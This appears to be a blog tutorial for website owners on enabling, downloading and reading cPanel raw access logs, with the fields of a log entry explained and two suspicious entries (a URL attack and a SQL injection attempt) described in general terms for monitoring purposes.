cPanel’s raw access logs is overlooked by many, while it can give you detailed insight of who is trying to access what pages, when, and from where.
By default, all cPanel web hosting accounts are set to delete the logs on a daily basis. I suggest you change the setting, so you can keep the logs and be able to check them later on a weekly or monthly basis. This may take more space on your web hosting account, but it’s worth doing for monitoring any suspicious activity.
Checking the access logs will give you good idea of areas of your site being accessed and your site’s response to it. If you notice any suspicious activity, you should do any of the following: double check your site’s pages, block the suspicious ip address, take an extra backup, or if you found any damage restore your site from a previous backup. You can also contact your web hosting provider about it.
How to find Raw Access Logs:
Let’s take a look at the access logs. To access raw logs, click on the Raw Access Logs icon from the main cPanel account page:
This will take you to the Raw Access Logs detail screen: (see image below)
Click on the first checkbox under configure logs title and then click the Save button.
This will allow the logs to be updated and added to the archive file, which you can download later to see activity for a period of up to a month.
You can see the archive file with under Archived Raw Logs link at the bottom of the screen. (see image below) Archive file name will have the domain name (grayed out in the image) with a date suffix and a .gz extension.
Once you click on any of the archives, you should be able to save it on you local disk and extract the content using either (winzip, 7-zip or any similar software)
Raw Access Logs Layout ( good example):
Raw access log entries starts with the ip address of the visitor followed by date of the visit. Next you can see the http request “Get” meaning the visitor accessing your site’s login form in this example (see image above). Following the Get request, we see the relative file name followed by the version of the HTTP request (1.1) Note: The 2 most popular requests you’ll find in the log file are “Get” and “Post”.
Next, you’ll find a numerical value 200, in this case it specifies the resulting status of the request. Typical values for this code are 200 (OK). Another known number is 404 (Not Found) and 403 (Forbidden). To learn more about HTTP Status codes, refer to the whole list in wikipedia.
The next numerical is 2125, a number indicating the total size (in bytes) of data transmitted for the request.
The next portion of our access log entry specifies the referrer, showing the URL of the referrer (grayed in the image sample).
Finally, the formal identity of the user-agent is specified at the end of the log raw.
Example of a suspicious Access Logs:
Here someone has tried to exploit the site via URL attack. Usually these attempts fail due to limited site access setup. Also a firewall running on the server should prevent such attacks. For you it is a good thing to know what is happening on your site, so you can either block the ip or it will alert you to keep a closer eye on your site in general.
Another example of a suspicious Access Logs:
Here someone has tried to exploit the site via sql injection. You can see “Union” and “Select” database statements that will give the user unauthorized information. This kind of attack can be prevented by the software and it’s capabilities to sanitize the query. WordPress is now a lot more secure than the earlier versions, however be careful of plugins or themes that could not be safe enough to block this kind of attack.